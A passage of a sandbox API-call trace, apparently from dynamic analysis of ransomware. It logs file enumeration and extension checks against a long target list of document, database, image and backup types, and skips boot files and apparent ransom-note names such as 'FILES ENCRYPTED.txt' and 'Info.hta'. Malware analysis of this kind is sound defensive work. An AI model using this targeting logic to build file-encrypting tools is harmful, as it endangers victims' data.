-1 [0321.605] lstrlenW (lpString=".bz2") returned 4 [0321.605] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0321.605] lstrlenW (lpString=".c") returned 2 [0321.605] lstrcmpiW (lpString1=".c", lpString2="ml") returned -1 [0321.605] lstrlenW (lpString=".cdr") returned 4 [0321.605] lstrcmpiW (lpString1=".cdr", lpString2="html") returned -1 [0321.605] lstrlenW (lpString=".cer") returned 4 [0321.605] lstrcmpiW (lpString1=".cer", lpString2="html") returned -1 [0321.605] lstrlenW (lpString=".cf") returned 3 [0321.605] lstrcmpiW (lpString1=".cf", lpString2="tml") returned -1 [0321.605] lstrlenW (lpString=".cfc") returned 4 [0321.605] lstrcmpiW (lpString1=".cfc", lpString2="html") returned -1 [0321.605] lstrlenW (lpString=".cfm") returned 4 [0321.605] lstrcmpiW (lpString1=".cfm", lpString2="html") returned -1 [0321.605] lstrlenW (lpString=".cfml") returned 5 [0321.605] lstrcmpiW (lpString1=".cfml", lpString2=".html") returned -1 [0321.605] lstrlenW (lpString=".cfu") returned 4 [0321.605] lstrcmpiW (lpString1=".cfu", lpString2="html") returned -1 [0321.605] lstrlenW (lpString=".chm") returned 4 [0321.605] lstrcmpiW (lpString1=".chm", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".cin") returned 4 [0321.606] lstrcmpiW (lpString1=".cin", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".class") returned 6 [0321.606] lstrcmpiW (lpString1=".class", lpString2="x.html") returned -1 [0321.606] lstrlenW (lpString=".clx") returned 4 [0321.606] lstrcmpiW (lpString1=".clx", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".config") returned 7 [0321.606] lstrcmpiW (lpString1=".config", lpString2="ex.html") returned -1 [0321.606] lstrlenW (lpString=".cpp") returned 4 [0321.606] lstrcmpiW (lpString1=".cpp", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".cr2") returned 4 [0321.606] lstrcmpiW (lpString1=".cr2", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".crt") returned 4 [0321.606] lstrcmpiW (lpString1=".crt", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".crw") returned 4 [0321.606] lstrcmpiW (lpString1=".crw", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".cs") returned 3 [0321.606] lstrcmpiW (lpString1=".cs", lpString2="tml") returned -1 [0321.606] lstrlenW (lpString=".css") returned 4 [0321.606] lstrcmpiW (lpString1=".css", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".csv") returned 4 [0321.606] lstrcmpiW (lpString1=".csv", lpString2="html") returned -1 [0321.606] lstrlenW (lpString=".cub") returned 4 [0321.607] lstrcmpiW (lpString1=".cub", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".dae") returned 4 [0321.607] lstrcmpiW (lpString1=".dae", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".dat") returned 4 [0321.607] lstrcmpiW (lpString1=".dat", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".db") returned 3 [0321.607] lstrcmpiW (lpString1=".db", lpString2="tml") returned -1 [0321.607] lstrlenW (lpString=".dbf") returned 4 [0321.607] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".dbx") returned 4 [0321.607] lstrcmpiW (lpString1=".dbx", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".dc3") returned 4 [0321.607] lstrcmpiW (lpString1=".dc3", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".dcm") returned 4 [0321.607] lstrcmpiW (lpString1=".dcm", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".dcr") returned 4 [0321.607] lstrcmpiW (lpString1=".dcr", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".der") returned 4 [0321.607] lstrcmpiW (lpString1=".der", lpString2="html") returned -1 [0321.607] lstrlenW (lpString=".dib") returned 4 [0321.608] lstrcmpiW (lpString1=".dib", lpString2="html") returned -1 [0321.608] lstrlenW (lpString=".dic") returned 4 [0321.608] lstrcmpiW (lpString1=".dic", lpString2="html") returned -1 [0321.608] lstrlenW (lpString=".dif") returned 4 [0321.608] lstrcmpiW (lpString1=".dif", lpString2="html") returned -1 [0321.608] lstrlenW (lpString=".divx") returned 5 [0321.608] lstrcmpiW (lpString1=".divx", lpString2=".html") returned -1 [0321.608] lstrlenW (lpString=".djvu") returned 5 [0321.608] lstrcmpiW (lpString1=".djvu", lpString2=".html") returned -1 [0321.608] lstrlenW (lpString=".dng") returned 4 [0321.608] lstrcmpiW (lpString1=".dng", lpString2="html") returned -1 [0321.608] lstrlenW (lpString=".doc") returned 4 [0321.608] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0321.608] lstrlenW (lpString=".docm") returned 5 [0321.608] lstrcmpiW (lpString1=".docm", lpString2=".html") returned -1 [0321.608] lstrlenW (lpString=".docx") returned 5 [0321.608] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0321.608] lstrlenW (lpString=".dot") returned 4 [0321.608] lstrcmpiW (lpString1=".dot", lpString2="html") returned -1 [0321.608] lstrlenW (lpString=".dotm") returned 5 [0321.608] lstrcmpiW (lpString1=".dotm", lpString2=".html") returned -1 [0321.608] lstrlenW (lpString=".dotx") returned 5 [0321.609] lstrcmpiW (lpString1=".dotx", lpString2=".html") returned -1 [0321.609] lstrlenW (lpString=".dpx") returned 4 [0321.609] lstrcmpiW (lpString1=".dpx", lpString2="html") returned -1 [0321.609] lstrlenW (lpString=".dqy") returned 4 [0321.609] lstrcmpiW (lpString1=".dqy", lpString2="html") returned -1 [0321.609] lstrlenW (lpString=".dsn") returned 4 [0321.609] lstrcmpiW (lpString1=".dsn", lpString2="html") returned -1 [0321.609] lstrlenW (lpString=".dt") returned 3 [0321.609] lstrcmpiW (lpString1=".dt", lpString2="tml") returned -1 [0321.609] lstrlenW (lpString=".dtd") returned 4 [0321.609] lstrcmpiW (lpString1=".dtd", lpString2="html") returned -1 [0321.609] lstrlenW (lpString=".dwg") returned 4 [0321.609] lstrcmpiW (lpString1=".dwg", lpString2="html") returned -1 [0321.609] lstrlenW (lpString=".dwt") returned 4 [0321.609] lstrcmpiW (lpString1=".dwt", lpString2="html") returned -1 [0321.609] lstrlenW (lpString=".dx") returned 3 [0321.609] lstrcmpiW (lpString1=".dx", lpString2="tml") returned -1 [0321.609] lstrlenW (lpString=".dxf") returned 4 [0321.609] lstrcmpiW (lpString1=".dxf", lpString2="html") returned -1 [0321.609] lstrlenW (lpString=".edml") returned 5 [0321.609] lstrcmpiW (lpString1=".edml", lpString2=".html") returned -1 [0321.609] lstrlenW (lpString=".efd") returned 4 [0321.609] lstrcmpiW (lpString1=".efd", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".elf") returned 4 [0321.610] lstrcmpiW (lpString1=".elf", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".emf") returned 4 [0321.610] lstrcmpiW (lpString1=".emf", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".emz") returned 4 [0321.610] lstrcmpiW (lpString1=".emz", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".epf") returned 4 [0321.610] lstrcmpiW (lpString1=".epf", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".eps") returned 4 [0321.610] lstrcmpiW (lpString1=".eps", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".epsf") returned 5 [0321.610] lstrcmpiW (lpString1=".epsf", lpString2=".html") returned -1 [0321.610] lstrlenW (lpString=".epsp") returned 5 [0321.610] lstrcmpiW (lpString1=".epsp", lpString2=".html") returned -1 [0321.610] lstrlenW (lpString=".erf") returned 4 [0321.610] lstrcmpiW (lpString1=".erf", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".exr") returned 4 [0321.610] lstrcmpiW (lpString1=".exr", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".f4v") returned 4 [0321.610] lstrcmpiW (lpString1=".f4v", lpString2="html") returned -1 [0321.610] lstrlenW (lpString=".fido") returned 5 [0321.610] lstrcmpiW (lpString1=".fido", lpString2=".html") returned -1 [0321.610] lstrlenW (lpString=".flm") returned 4 [0321.610] lstrcmpiW (lpString1=".flm", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".flv") returned 4 [0321.611] lstrcmpiW (lpString1=".flv", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".frm") returned 4 [0321.611] lstrcmpiW (lpString1=".frm", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".fxg") returned 4 [0321.611] lstrcmpiW (lpString1=".fxg", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".geo") returned 4 [0321.611] lstrcmpiW (lpString1=".geo", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".gif") returned 4 [0321.611] lstrcmpiW (lpString1=".gif", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".grs") returned 4 [0321.611] lstrcmpiW (lpString1=".grs", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".gz") returned 3 [0321.611] lstrcmpiW (lpString1=".gz", lpString2="tml") returned -1 [0321.611] lstrlenW (lpString=".h") returned 2 [0321.611] lstrcmpiW (lpString1=".h", lpString2="ml") returned -1 [0321.611] lstrlenW (lpString=".hdr") returned 4 [0321.611] lstrcmpiW (lpString1=".hdr", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".hpp") returned 4 [0321.611] lstrcmpiW (lpString1=".hpp", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".hta") returned 4 [0321.611] lstrcmpiW (lpString1=".hta", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".htc") returned 4 [0321.611] lstrcmpiW (lpString1=".htc", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".htm") returned 4 [0321.611] lstrcmpiW (lpString1=".htm", lpString2="html") returned -1 [0321.611] lstrlenW (lpString=".html") returned 5 [0321.612] lstrcmpiW (lpString1=".html", lpString2=".html") returned 0 [0321.612] lstrlenW (lpString="index.html") returned 10 [0321.612] lstrlenW (lpString=".MSPLT") returned 6 [0321.612] lstrcmpiW (lpString1=".MSPLT", lpString2="x.html") returned -1 [0321.612] lstrlenW (lpString="index.html") returned 10 [0321.612] lstrcmpiW (lpString1="boot.ini", lpString2="index.html") returned -1 [0321.612] lstrcmpiW (lpString1="bootfont.bin", lpString2="index.html") returned -1 [0321.612] lstrcmpiW (lpString1="ntldr", lpString2="index.html") returned 1 [0321.612] lstrcmpiW (lpString1="ntdetect.com", lpString2="index.html") returned 1 [0321.612] lstrcmpiW (lpString1="io.sys", lpString2="index.html") returned 1 [0321.612] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="index.html") returned -1 [0321.612] lstrcmpiW (lpString1="Info.hta", lpString2="index.html") returned 1 [0321.612] lstrcmpiW (lpString1="wdgmug.exe", lpString2="index.html") returned 1 [0321.612] lstrlenW (lpString="C:\\Program Files\\UNP\\CampaignManager\\Campaigns\\{91be532c-f9f1-406a-9858-43697c6f437a}\\Content1\\bg-BG\\index.html") returned 111 [0321.612] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e32400a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x18026100, ftLastWriteTime.dwHighDateTime=0x1d2c3e2, nFileSizeHigh=0x0, nFileSizeLow=0x2ad, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastbeginupgrade.xml", cAlternateFileName="TOASTB~1.XML")) returned 1 [0321.612] lstrlenW (lpString="toastbeginupgrade.xml") returned 21 [0321.612] lstrlenW (lpString=".1cd") returned 4 [0321.612] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0321.612] lstrlenW (lpString=".3ds") returned 4 [0321.612] lstrcmpiW (lpString1=".3ds", lpString2=".xml") returned -1 [0321.612] lstrlenW (lpString=".3fr") returned 4 [0321.612] lstrcmpiW (lpString1=".3fr", lpString2=".xml") returned -1 [0321.613] lstrlenW (lpString=".3g2") returned 4 [0321.613] lstrcmpiW (lpString1=".3g2", lpString2=".xml") returned -1 [0321.613] lstrlenW (lpString=".3gp") returned 4 [0321.613] lstrcmpiW (lpString1=".3gp", lpString2=".xml") returned -1 [0321.613] lstrlenW (lpString=".7z") returned 3 [0321.613] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0321.613] lstrlenW (lpString=".accda") returned 6 [0321.613] lstrcmpiW (lpString1=".accda", lpString2="de.xml") returned -1 [0321.613] lstrlenW (lpString=".accdb") returned 6 [0321.613] lstrcmpiW (lpString1=".accdb", lpString2="de.xml") returned -1 [0321.613] lstrlenW (lpString=".accdc") returned 6 [0321.613] lstrcmpiW (lpString1=".accdc", lpString2="de.xml") returned -1 [0321.613] lstrlenW (lpString=".accde") returned 6 [0321.613] lstrcmpiW (lpString1=".accde", lpString2="de.xml") returned -1 [0321.613] lstrlenW (lpString=".accdt") returned 6 [0321.613] lstrcmpiW (lpString1=".accdt", lpString2="de.xml") returned -1 [0321.613] lstrlenW (lpString=".accdw") returned 6 [0321.613] lstrcmpiW (lpString1=".accdw", lpString2="de.xml") returned -1 [0321.613] lstrlenW (lpString=".adb") returned 4 [0321.613] lstrcmpiW (lpString1=".adb", lpString2=".xml") returned -1 [0321.613] lstrlenW (lpString=".adp") returned 4 [0321.613] lstrcmpiW (lpString1=".adp", lpString2=".xml") returned -1 [0321.613] lstrlenW (lpString=".ai") returned 3 [0321.613] lstrcmpiW (lpString1=".ai", lpString2="xml") returned -1 [0321.614] lstrlenW (lpString=".ai3") returned 4 [0321.614] lstrcmpiW (lpString1=".ai3", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".ai4") returned 4 [0321.614] lstrcmpiW (lpString1=".ai4", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".ai5") returned 4 [0321.614] lstrcmpiW (lpString1=".ai5", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".ai6") returned 4 [0321.614] lstrcmpiW (lpString1=".ai6", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".ai7") returned 4 [0321.614] lstrcmpiW (lpString1=".ai7", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".ai8") returned 4 [0321.614] lstrcmpiW (lpString1=".ai8", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".anim") returned 5 [0321.614] lstrcmpiW (lpString1=".anim", lpString2="e.xml") returned -1 [0321.614] lstrlenW (lpString=".arw") returned 4 [0321.614] lstrcmpiW (lpString1=".arw", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".as") returned 3 [0321.614] lstrcmpiW (lpString1=".as", lpString2="xml") returned -1 [0321.614] lstrlenW (lpString=".asa") returned 4 [0321.614] lstrcmpiW (lpString1=".asa", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".asc") returned 4 [0321.614] lstrcmpiW (lpString1=".asc", lpString2=".xml") returned -1 [0321.614] lstrlenW (lpString=".ascx") returned 5 [0321.614] lstrcmpiW (lpString1=".ascx", lpString2="e.xml") returned -1 [0321.614] lstrlenW (lpString=".asm") returned 4 [0321.615] lstrcmpiW (lpString1=".asm", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".asmx") returned 5 [0321.615] lstrcmpiW (lpString1=".asmx", lpString2="e.xml") returned -1 [0321.615] lstrlenW (lpString=".asp") returned 4 [0321.615] lstrcmpiW (lpString1=".asp", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".aspx") returned 5 [0321.615] lstrcmpiW (lpString1=".aspx", lpString2="e.xml") returned -1 [0321.615] lstrlenW (lpString=".asr") returned 4 [0321.615] lstrcmpiW (lpString1=".asr", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".asx") returned 4 [0321.615] lstrcmpiW (lpString1=".asx", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".avi") returned 4 [0321.615] lstrcmpiW (lpString1=".avi", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".avs") returned 4 [0321.615] lstrcmpiW (lpString1=".avs", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".backup") returned 7 [0321.615] lstrcmpiW (lpString1=".backup", lpString2="ade.xml") returned -1 [0321.615] lstrlenW (lpString=".bak") returned 4 [0321.615] lstrcmpiW (lpString1=".bak", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".bay") returned 4 [0321.615] lstrcmpiW (lpString1=".bay", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".bd") returned 3 [0321.615] lstrcmpiW (lpString1=".bd", lpString2="xml") returned -1 [0321.615] lstrlenW (lpString=".bin") returned 4 [0321.615] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0321.615] lstrlenW (lpString=".bmp") returned 4 [0321.616] lstrcmpiW (lpString1=".bmp", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".bz2") returned 4 [0321.616] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".c") returned 2 [0321.616] lstrcmpiW (lpString1=".c", lpString2="ml") returned -1 [0321.616] lstrlenW (lpString=".cdr") returned 4 [0321.616] lstrcmpiW (lpString1=".cdr", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".cer") returned 4 [0321.616] lstrcmpiW (lpString1=".cer", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".cf") returned 3 [0321.616] lstrcmpiW (lpString1=".cf", lpString2="xml") returned -1 [0321.616] lstrlenW (lpString=".cfc") returned 4 [0321.616] lstrcmpiW (lpString1=".cfc", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".cfm") returned 4 [0321.616] lstrcmpiW (lpString1=".cfm", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".cfml") returned 5 [0321.616] lstrcmpiW (lpString1=".cfml", lpString2="e.xml") returned -1 [0321.616] lstrlenW (lpString=".cfu") returned 4 [0321.616] lstrcmpiW (lpString1=".cfu", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".chm") returned 4 [0321.616] lstrcmpiW (lpString1=".chm", lpString2=".xml") returned -1 [0321.616] lstrlenW (lpString=".cin") returned 4 [0321.616] lstrcmpiW (lpString1=".cin", lpString2=".xml") returned -1 [0321.617] lstrlenW (lpString=".class") returned 6 [0321.617] lstrcmpiW (lpString1=".class", lpString2="de.xml") returned -1 [0321.617] lstrlenW (lpString=".clx") returned 4 [0321.617] lstrcmpiW (lpString1=".clx", lpString2=".xml") returned -1 [0321.617] lstrlenW (lpString=".config") returned 7 [0321.617] lstrcmpiW (lpString1=".config", lpString2="ade.xml") returned -1 [0321.617] lstrlenW (lpString=".cpp") returned 4 [0321.617] lstrcmpiW (lpString1=".cpp", lpString2=".xml") returned -1 [0321.617] lstrlenW (lpString=".cr2") returned 4 [0321.617] lstrcmpiW (lpString1=".cr2", lpString2=".xml") returned -1 [0321.617] lstrlenW (lpString=".crt") returned 4 [0321.617] lstrcmpiW (lpString1=".crt", lpString2=".xml") returned -1 [0321.617] lstrlenW (lpString=".crw") returned 4 [0321.617] lstrcmpiW (lpString1=".crw", lpString2=".xml") returned -1 [0321.617] lstrlenW (lpString=".cs") returned 3 [0321.617] lstrcmpiW (lpString1=".cs", lpString2="xml") returned -1 [0321.617] lstrlenW (lpString=".css") returned 4 [0321.617] lstrcmpiW (lpString1=".css", lpString2=".xml") returned -1 [0321.617] lstrlenW (lpString=".csv") returned 4 [0321.618] lstrcmpiW (lpString1=".csv", lpString2=".xml") returned -1 [0321.618] lstrlenW (lpString=".cub") returned 4 [0321.618] lstrcmpiW (lpString1=".cub", lpString2=".xml") returned -1 [0321.618] lstrlenW (lpString=".dae") returned 4 [0321.618] lstrcmpiW (lpString1=".dae", lpString2=".xml") returned -1 [0321.618] lstrlenW (lpString=".dat") returned 4 [0321.618] lstrcmpiW (lpString1=".dat", lpString2=".xml") returned -1 [0321.618] lstrlenW (lpString=".db") returned 3 [0321.618] lstrcmpiW (lpString1=".db", lpString2="xml") returned -1 [0321.619] lstrlenW (lpString=".dbf") returned 4 [0321.619] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0321.619] lstrlenW (lpString=".dbx") returned 4 [0321.619] lstrcmpiW (lpString1=".dbx", lpString2=".xml") returned -1 [0321.619] lstrlenW (lpString=".dc3") returned 4 [0321.619] lstrcmpiW (lpString1=".dc3", lpString2=".xml") returned -1 [0321.619] lstrlenW (lpString=".dcm") returned 4 [0321.619] lstrcmpiW (lpString1=".dcm", lpString2=".xml") returned -1 [0321.619] lstrlenW (lpString=".dcr") returned 4 [0321.619] lstrcmpiW (lpString1=".dcr", lpString2=".xml") returned -1 [0321.619] lstrlenW (lpString=".der") returned 4 [0321.619] lstrcmpiW (lpString1=".der", lpString2=".xml") returned -1 [0321.619] lstrlenW (lpString=".dib") returned 4 [0321.619] lstrcmpiW (lpString1=".dib", lpString2=".xml") returned -1 [0321.619] lstrlenW (lpString=".dic") returned 4 [0321.619] lstrcmpiW (lpString1=".dic", lpString2=".xml") returned -1 [0321.620] lstrlenW (lpString=".dif") returned 4 [0321.620] lstrcmpiW (lpString1=".dif", lpString2=".xml") returned -1 [0321.620] lstrlenW (lpString=".divx") returned 5 [0321.620] lstrcmpiW (lpString1=".divx", lpString2="e.xml") returned -1 [0321.620] lstrlenW (lpString=".djvu") returned 5 [0321.620] lstrcmpiW (lpString1=".djvu", lpString2="e.xml") returned -1 [0321.620] lstrlenW (lpString=".dng") returned 4 [0321.620] lstrcmpiW (lpString1=".dng", lpString2=".xml") returned -1 [0321.620] lstrlenW (lpString=".doc") returned 4 [0321.620] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0321.620] lstrlenW (lpString=".docm") returned 5 [0321.620] lstrcmpiW (lpString1=".docm", lpString2="e.xml") returned -1 [0321.620] lstrlenW (lpString=".docx") returned 5 [0321.620] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0321.620] lstrlenW (lpString=".dot") returned 4 [0321.620] lstrcmpiW (lpString1=".dot", lpString2=".xml") returned -1 [0321.620] lstrlenW (lpString=".dotm") returned 5 [0321.620] lstrcmpiW (lpString1=".dotm", lpString2="e.xml") returned -1 [0321.620] lstrlenW (lpString=".dotx") returned 5 [0321.621] lstrcmpiW (lpString1=".dotx", lpString2="e.xml") returned -1 [0321.621] lstrlenW (lpString=".dpx") returned 4 [0321.621] lstrcmpiW (lpString1=".dpx", lpString2=".xml") returned -1 [0321.621] lstrlenW (lpString=".dqy") returned 4 [0321.621] lstrcmpiW (lpString1=".dqy", lpString2=".xml") returned -1 [0321.621] lstrlenW (lpString=".dsn") returned 4 [0321.621] lstrcmpiW (lpString1=".dsn", lpString2=".xml") returned -1 [0321.621] lstrlenW (lpString=".dt") returned 3 [0321.621] lstrcmpiW (lpString1=".dt", lpString2="xml") returned -1 [0321.621] lstrlenW (lpString=".dtd") returned 4 [0321.621] lstrcmpiW (lpString1=".dtd", lpString2=".xml") returned -1 [0321.621] lstrlenW (lpString=".dwg") returned 4 [0321.621] lstrcmpiW (lpString1=".dwg", lpString2=".xml") returned -1 [0321.621] lstrlenW (lpString=".dwt") returned 4 [0321.621] lstrcmpiW (lpString1=".dwt", lpString2=".xml") returned -1 [0321.621] lstrlenW (lpString=".dx") returned 3 [0321.621] lstrcmpiW (lpString1=".dx", lpString2="xml") returned -1 [0321.621] lstrlenW (lpString=".dxf") returned 4 [0321.621] lstrcmpiW (lpString1=".dxf", lpString2=".xml") returned -1 [0321.621] lstrlenW (lpString=".edml") returned 5 [0321.621] lstrcmpiW (lpString1=".edml", lpString2="e.xml") returned -1 [0321.622] lstrlenW (lpString=".efd") returned 4 [0321.622] lstrcmpiW (lpString1=".efd", lpString2=".xml") returned -1 [0321.622] lstrlenW (lpString=".elf") returned 4 [0321.622] lstrcmpiW (lpString1=".elf", lpString2=".xml") returned -1 [0321.622] lstrlenW (lpString=".emf") returned 4 [0321.622] lstrcmpiW (lpString1=".emf", lpString2=".xml") returned -1 [0321.622] lstrlenW (lpString=".emz") returned 4 [0321.622] lstrcmpiW (lpString1=".emz", lpString2=".xml") returned -1 [0321.622] lstrlenW (lpString=".epf") returned 4 [0321.622] lstrcmpiW (lpString1=".epf", lpString2=".xml") returned -1 [0321.622] lstrlenW (lpString=".eps") returned 4 [0321.622] lstrcmpiW (lpString1=".eps", lpString2=".xml") returned -1 [0321.622] lstrlenW (lpString=".epsf") returned 5 [0321.622] lstrcmpiW (lpString1=".epsf", lpString2="e.xml") returned -1 [0321.622] lstrlenW (lpString=".epsp") returned 5 [0321.622] lstrcmpiW (lpString1=".epsp", lpString2="e.xml") returned -1 [0321.622] lstrlenW (lpString=".erf") returned 4 [0321.623] lstrcmpiW (lpString1=".erf", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".exr") returned 4 [0321.623] lstrcmpiW (lpString1=".exr", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".f4v") returned 4 [0321.623] lstrcmpiW (lpString1=".f4v", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".fido") returned 5 [0321.623] lstrcmpiW (lpString1=".fido", lpString2="e.xml") returned -1 [0321.623] lstrlenW (lpString=".flm") returned 4 [0321.623] lstrcmpiW (lpString1=".flm", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".flv") returned 4 [0321.623] lstrcmpiW (lpString1=".flv", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".frm") returned 4 [0321.623] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".fxg") returned 4 [0321.623] lstrcmpiW (lpString1=".fxg", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".geo") returned 4 [0321.623] lstrcmpiW (lpString1=".geo", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".gif") returned 4 [0321.623] lstrcmpiW (lpString1=".gif", lpString2=".xml") returned -1 [0321.623] lstrlenW (lpString=".grs") returned 4 [0321.624] lstrcmpiW (lpString1=".grs", lpString2=".xml") returned -1 [0321.624] lstrlenW (lpString=".gz") returned 3 [0321.624] lstrcmpiW (lpString1=".gz", lpString2="xml") returned -1 [0321.624] lstrlenW (lpString=".h") returned 2 [0321.624] lstrcmpiW (lpString1=".h", lpString2="ml") returned -1 [0321.624] lstrlenW (lpString=".hdr") returned 4 [0321.624] lstrcmpiW (lpString1=".hdr", lpString2=".xml") returned -1 [0321.624] lstrlenW (lpString=".hpp") returned 4 [0321.624] lstrcmpiW (lpString1=".hpp", lpString2=".xml") returned -1 [0321.624] lstrlenW (lpString=".hta") returned 4 [0321.624] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0321.624] lstrlenW (lpString=".htc") returned 4 [0321.624] lstrcmpiW (lpString1=".htc", lpString2=".xml") returned -1 [0321.624] lstrlenW (lpString=".htm") returned 4 [0321.625] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e32400a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x6e978800, ftLastWriteTime.dwHighDateTime=0x1d2d919, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastbeginupgradeth2.xml", cAlternateFileName="TOASTB~2.XML")) returned 1 [0321.625] lstrlenW (lpString="toastbeginupgradeth2.xml") returned 24 [0321.625] lstrlenW (lpString=".1cd") returned 4 [0321.625] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e32400a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c4a7800, ftLastWriteTime.dwHighDateTime=0x1d2db6e, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastreviewsettings.xml", cAlternateFileName="TOASTR~1.XML")) returned 1 [0321.625] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e32400a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c4a7800, ftLastWriteTime.dwHighDateTime=0x1d2db6e, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastreviewsettings.xml", cAlternateFileName="TOASTR~1.XML")) returned 0 [0321.625] FindClose (in: hFindFile=0x3948768 | out: hFindFile=0x3948768) returned 1 [0321.627] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.627] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, 